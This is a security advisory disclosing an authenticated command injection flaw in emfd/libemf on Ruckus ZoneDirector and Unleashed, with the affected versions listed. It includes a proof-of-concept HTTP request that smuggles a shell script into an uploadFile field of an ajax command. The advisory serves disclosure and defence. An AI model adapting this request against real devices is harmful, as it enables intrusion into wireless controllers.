<--

Authenticated command injection in emfd/libemf

Aleph Research Advisory

Identifier

Severity

High

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Technical Details

emfd/libemf in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to achieve command injection via a crafted HTTP request.

Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.

Proof Of Concept

POST /admin/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
X-CSRF-Token: 1VvEMc1nbx
Cookie: -ejs-session-=x0ea15a04dc0b243874d37739741e4946
Content-Length: 205

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'>
<xcmd cmd='import-avpport' uploadFile='#!/bin/sh\nsleep\t10' type='wlan-maxnums'/>
</ajax-request>

Timeline

Posts

Credit

External References